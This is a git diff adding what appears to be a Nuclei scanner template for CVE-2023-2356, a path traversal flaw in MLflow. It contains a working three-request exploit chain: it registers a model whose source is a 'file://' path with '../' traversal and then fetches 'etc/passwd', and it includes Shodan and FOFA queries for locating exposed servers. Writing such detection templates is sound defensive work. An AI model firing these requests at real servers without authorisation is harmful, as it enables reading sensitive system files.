diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml new file mode 100644 index 0000000000..8938fb957c --- /dev/null +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-2356 + +info: + name: Mlflow <2.3.0 - Local File Inclusion + author: Co5mos + severity: high + description: | + Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. + reference: + - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-2356 + cwe-id: CWE-23 + metadata: + verified: "true" + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" + tags: cve,cve2023,lfi,huntr,mlflow,oss + +variables: + str: "{{rand_base(6)}}" + +http: + - raw: + - | + POST /api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{str}}"} + + - | + POST /api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} + + - | + GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + internal: true + group: 1 + regex: + - '"version": "([0-9.]+)",'